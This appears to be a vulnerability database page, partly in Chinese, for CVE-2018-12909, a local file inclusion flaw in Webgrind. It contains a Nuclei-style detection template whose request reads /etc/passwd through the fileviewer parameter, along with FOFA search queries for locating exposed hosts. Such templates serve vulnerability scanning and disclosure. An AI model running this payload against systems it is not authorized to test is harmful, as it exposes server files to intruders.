CVE-2018-12909: Webgrind <= 1.5 - Local File Inclusion

日期: 2025-08-01 | 影响软件: Webgrind | POC: 已公开

漏洞描述

Webgrind 1.5 relies on user input to display a file, which lets anyone view files from the local filesystem (that the webserver user has access to) via an index.php?op=fileviewer&file= URI

PoC代码[已公开]

id: CVE-2018-12909

info:
  name: Webgrind <= 1.5 - Local File Inclusion
  author: DhiyaneshDk
  severity: high
  description: |
    Webgrind 1.5 relies on user input to display a file, which lets anyone view files from the local filesystem (that the webserver user has access to) via an index.php?op=fileviewer&file= URI
  remediation: |
    Upgrade Webgrind to a version higher than 1.5 or apply the necessary patches provided by the vendor.
  reference:
    - https://github.com/Threekiii/Awesome-POC/blob/master/Web%E5%BA%94%E7%94%A8%E6%BC%8F%E6%B4%9E/Webgrind%20fileviewer.phtml%20%E4%BB%BB%E6%84%8F%E6%96%87%E4%BB%B6%E8%AF%BB%E5%8F%96%E6%BC%8F%E6%B4%9E%20CVE-2018-12909.md
    - https://github.com/jokkedk/webgrind/issues/112
    - https://nvd.nist.gov/vuln/detail/CVE-2018-12909
    - https://github.com/KayCHENvip/vulnerability-poc
    - https://github.com/Miraitowa70/POC-Notes
  classification:
    cvss-metrics: CVSS:3.0/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:N/A:N
    cvss-score: 7.5
    cve-id: CVE-2018-12909
    cwe-id: CWE-22
    epss-score: 0.87459
    epss-percentile: 0.99426
    cpe: cpe:2.3:a:webgrind_project:webgrind:1.5.0:*:*:*:*:*:*:*
  metadata:
    verified: true
    max-request: 1
    vendor: webgrind_project
    product: webgrind
    fofa-query:
      - app="Webgrind"
      - app="webgrind"
  tags: cve,cve2018,lfi,webgrind,webgrind_project

http:
  - method: GET
    path:
      - "{{BaseURL}}/index.php?op=fileviewer&file=/etc/passwd"

    matchers-condition: and
    matchers:
      - type: regex
        part: body
        regex:
          - 'root:.*:0:0:'
          - 'webgrind'
        condition: and

      - type: status
        status:
          - 200
# digest: 4b0a0048304602210095debaf840b205596fd6228fc24d08557797dd801744a95302229186f33d4c02022100a3fb3a6bc459132e5e56c09142e1e5552fe4c65921a35ed58ac523a2d1e76303:922c64590222798bb761d5b6d8e72950

相关漏洞推荐